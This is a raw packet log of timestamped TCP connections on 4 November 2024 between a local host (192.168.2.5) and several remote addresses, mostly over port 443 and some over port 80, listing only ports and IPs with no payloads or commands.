Nov 4, 2024 17:32:03.481059074 CET	443	49923	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.489077091 CET	443	49921	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.489444971 CET	49921	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.489454031 CET	443	49921	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.489856005 CET	49921	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.489860058 CET	443	49921	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.493180990 CET	443	49920	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.493511915 CET	49920	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.493541002 CET	443	49920	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.493901968 CET	49920	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.493907928 CET	443	49920	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.500880003 CET	443	49924	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.501328945 CET	49924	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.501344919 CET	443	49924	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.501753092 CET	49924	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.501758099 CET	443	49924	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.607686043 CET	443	49923	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.607764959 CET	443	49923	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.607840061 CET	49923	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.608048916 CET	49923	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.608067989 CET	443	49923	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.608088970 CET	49923	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.608097076 CET	443	49923	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.610673904 CET	49927	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.610713005 CET	443	49927	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.610800982 CET	49927	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.610960007 CET	49927	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.610976934 CET	443	49927	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.620018005 CET	443	49921	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.620068073 CET	443	49921	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.620120049 CET	443	49921	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.620151043 CET	49921	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.620187998 CET	49921	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.620341063 CET	49921	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.620347023 CET	443	49921	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.620357990 CET	49921	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.620363951 CET	443	49921	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.622247934 CET	49928	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.622289896 CET	443	49928	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.622380018 CET	49928	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.622498989 CET	49928	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.622513056 CET	443	49928	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.626862049 CET	443	49920	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.626919031 CET	443	49920	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.626981974 CET	49920	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.627119064 CET	49920	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.627136946 CET	443	49920	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.627150059 CET	49920	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.627156019 CET	443	49920	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.628932953 CET	49929	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.628959894 CET	443	49929	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.629035950 CET	49929	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.629148960 CET	49929	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.629158020 CET	443	49929	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.631300926 CET	443	49924	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.631365061 CET	443	49924	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.631428957 CET	49924	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.631556034 CET	49924	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.631570101 CET	443	49924	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.631578922 CET	49924	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.631583929 CET	443	49924	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.633308887 CET	49930	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.633322001 CET	443	49930	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.633403063 CET	49930	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.633518934 CET	49930	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.633529902 CET	443	49930	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.847733021 CET	443	49926	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.848349094 CET	49926	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.848366976 CET	443	49926	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.848795891 CET	49926	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.848802090 CET	443	49926	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.888659954 CET	443	49922	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:03.888753891 CET	49922	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:03.890604973 CET	49922	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:03.890618086 CET	443	49922	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:03.891057014 CET	443	49922	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:03.892282963 CET	49922	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:03.892343998 CET	49922	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:03.892352104 CET	443	49922	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:03.892435074 CET	49922	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:03.939326048 CET	443	49922	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:03.978509903 CET	443	49926	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.978679895 CET	443	49926	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.978737116 CET	443	49926	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.978785992 CET	49926	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.978816032 CET	49926	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.979032040 CET	49926	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.979057074 CET	443	49926	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.979073048 CET	49926	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.979079962 CET	443	49926	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.981756926 CET	49931	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.981805086 CET	443	49931	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.981897116 CET	49931	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.982040882 CET	49931	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:03.982055902 CET	443	49931	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:03.982312918 CET	80	49925	185.215.113.43	192.168.2.5
Nov 4, 2024 17:32:03.984121084 CET	49925	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:04.145215034 CET	443	49922	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:04.145762920 CET	49922	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:04.145781994 CET	443	49922	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:04.145802021 CET	49922	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:04.145845890 CET	49922	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:04.343422890 CET	443	49927	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.344088078 CET	49927	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.344105005 CET	443	49927	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.344516993 CET	49927	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.344525099 CET	443	49927	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.363329887 CET	443	49928	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.363857985 CET	49928	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.363888025 CET	443	49928	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.364336014 CET	49928	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.364345074 CET	443	49928	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.364681005 CET	443	49930	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.365077972 CET	49930	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.365091085 CET	443	49930	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.365565062 CET	49930	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.365570068 CET	443	49930	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.373384953 CET	443	49929	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.373965979 CET	49929	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.373981953 CET	443	49929	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.374377966 CET	49929	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.374382973 CET	443	49929	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.474422932 CET	443	49927	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.474495888 CET	443	49927	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.474579096 CET	49927	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.474922895 CET	49927	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.474946022 CET	443	49927	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.474978924 CET	49927	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.474986076 CET	443	49927	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.477513075 CET	49932	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.477547884 CET	443	49932	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.478122950 CET	49932	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.478252888 CET	49932	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.478265047 CET	443	49932	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.494133949 CET	443	49930	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.494194984 CET	443	49930	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.494400024 CET	49930	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.494504929 CET	49930	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.494525909 CET	443	49930	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.494538069 CET	49930	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.494544029 CET	443	49930	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.496180058 CET	443	49928	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.496211052 CET	443	49928	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.496264935 CET	443	49928	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.496361971 CET	49928	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.496361971 CET	49928	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.496507883 CET	49928	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.496514082 CET	443	49928	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.496524096 CET	49928	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.496527910 CET	443	49928	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.497539997 CET	49933	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.497597933 CET	443	49933	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.497669935 CET	49933	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.497814894 CET	49933	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.497821093 CET	443	49933	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.498517990 CET	49934	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.498542070 CET	443	49934	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.498615026 CET	49934	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.498716116 CET	49934	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.498732090 CET	443	49934	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.505376101 CET	443	49929	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.506159067 CET	443	49929	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.508610010 CET	49929	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.508678913 CET	49929	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.508692980 CET	443	49929	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.508704901 CET	49929	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.508708954 CET	443	49929	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.511068106 CET	49935	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.511125088 CET	443	49935	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.511208057 CET	49935	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.511338949 CET	49935	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.511354923 CET	443	49935	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.741425037 CET	443	49931	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.786828995 CET	49931	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.803359032 CET	49931	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.803379059 CET	443	49931	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.803832054 CET	49931	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.803837061 CET	443	49931	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.935993910 CET	443	49931	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.936031103 CET	443	49931	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.936085939 CET	443	49931	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:04.936096907 CET	49931	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:04.936145067 CET	49931	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.084028006 CET	49931	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.084069014 CET	443	49931	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.084115982 CET	49931	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.084125042 CET	443	49931	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.216680050 CET	443	49932	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.218826056 CET	443	49933	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.230422974 CET	443	49934	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.239892960 CET	443	49935	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.271159887 CET	49932	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.271270037 CET	49935	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.271289110 CET	49934	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.271302938 CET	443	49935	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.271332026 CET	49933	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.271730900 CET	49935	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.271742105 CET	443	49935	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.274239063 CET	49934	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.274245977 CET	443	49934	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.274903059 CET	49934	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.274909019 CET	443	49934	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.326622009 CET	49932	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.326632977 CET	443	49932	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.327857018 CET	49932	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.327863932 CET	443	49932	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.328159094 CET	49933	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.328186035 CET	443	49933	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.328828096 CET	49933	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.328841925 CET	443	49933	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.349158049 CET	49936	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.349205971 CET	443	49936	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.349307060 CET	49936	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.350050926 CET	49936	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.350070000 CET	443	49936	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.396544933 CET	443	49935	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.396789074 CET	443	49935	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.396862984 CET	49935	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.402131081 CET	49935	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.402159929 CET	443	49935	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.402173042 CET	49935	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.402179956 CET	443	49935	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.404736996 CET	443	49934	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.404825926 CET	443	49934	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.404887915 CET	443	49934	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.404902935 CET	49934	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.404947042 CET	49934	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.406548023 CET	49934	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.406563044 CET	443	49934	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.406574965 CET	49934	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.406580925 CET	443	49934	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.411856890 CET	49937	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.411902905 CET	443	49937	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.411998034 CET	49937	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.423897982 CET	49938	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.423950911 CET	443	49938	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.424020052 CET	49938	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.427687883 CET	49937	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.427710056 CET	443	49937	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.429379940 CET	49938	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.429404974 CET	443	49938	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.452893972 CET	443	49933	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.453414917 CET	443	49933	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.453470945 CET	49933	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.454693079 CET	443	49932	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.454767942 CET	443	49932	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.454900026 CET	49932	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.457695007 CET	49933	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.457726002 CET	443	49933	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.457761049 CET	49933	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.457768917 CET	443	49933	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.457845926 CET	49932	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.457845926 CET	49932	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.457864046 CET	443	49932	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.457873106 CET	443	49932	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.491437912 CET	49939	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.491486073 CET	443	49939	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.491559029 CET	49939	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.491980076 CET	49939	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.491992950 CET	443	49939	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.492225885 CET	49925	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:05.492532015 CET	49940	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:05.492923021 CET	49941	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.492954969 CET	443	49941	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.493031979 CET	49941	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.493159056 CET	49941	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:05.493170023 CET	443	49941	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:05.497515917 CET	80	49925	185.215.113.43	192.168.2.5
Nov 4, 2024 17:32:05.497535944 CET	80	49940	185.215.113.43	192.168.2.5
Nov 4, 2024 17:32:05.497644901 CET	49925	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:05.497647047 CET	49940	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:05.498366117 CET	49940	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:05.503354073 CET	80	49940	185.215.113.43	192.168.2.5
Nov 4, 2024 17:32:06.091459990 CET	443	49936	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.094196081 CET	49936	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.094229937 CET	443	49936	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.094727993 CET	49936	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.094733953 CET	443	49936	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.167488098 CET	443	49938	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.168004036 CET	49938	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.168034077 CET	443	49938	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.168533087 CET	49938	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.168539047 CET	443	49938	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.170818090 CET	443	49937	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.171349049 CET	49937	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.171374083 CET	443	49937	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.171695948 CET	49937	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.171700954 CET	443	49937	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.221795082 CET	443	49939	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.222501993 CET	443	49936	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.222528934 CET	443	49936	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.222573042 CET	443	49936	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.222572088 CET	49939	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.222589016 CET	443	49939	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.222712040 CET	49936	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.222712994 CET	49936	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.223193884 CET	49939	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.223201036 CET	443	49939	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.223263979 CET	49936	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.223284960 CET	443	49936	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.223299980 CET	49936	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.223306894 CET	443	49936	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.226257086 CET	49942	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.226310015 CET	443	49942	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.226471901 CET	49942	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.226581097 CET	49942	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.226592064 CET	443	49942	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.244203091 CET	443	49941	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.244683027 CET	49941	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.244704962 CET	443	49941	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.245136023 CET	49941	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.245142937 CET	443	49941	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.298546076 CET	443	49938	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.298615932 CET	443	49938	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.298814058 CET	49938	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.298867941 CET	49938	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.298883915 CET	443	49938	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.298894882 CET	49938	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.298901081 CET	443	49938	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.301655054 CET	49943	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.301683903 CET	443	49943	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.301796913 CET	49943	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.301868916 CET	49943	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.301877975 CET	443	49943	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.350605011 CET	443	49939	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.350760937 CET	443	49939	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.350899935 CET	49939	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.350899935 CET	49939	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.350929022 CET	49939	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.350944996 CET	443	49939	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.353291988 CET	49944	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.353322029 CET	443	49944	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.353404999 CET	49944	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.353544950 CET	49944	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.353555918 CET	443	49944	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.374979973 CET	443	49941	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.375011921 CET	443	49941	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.375060081 CET	443	49941	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.375092983 CET	49941	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.375124931 CET	49941	443	192.168.2.5	13.107.246.45
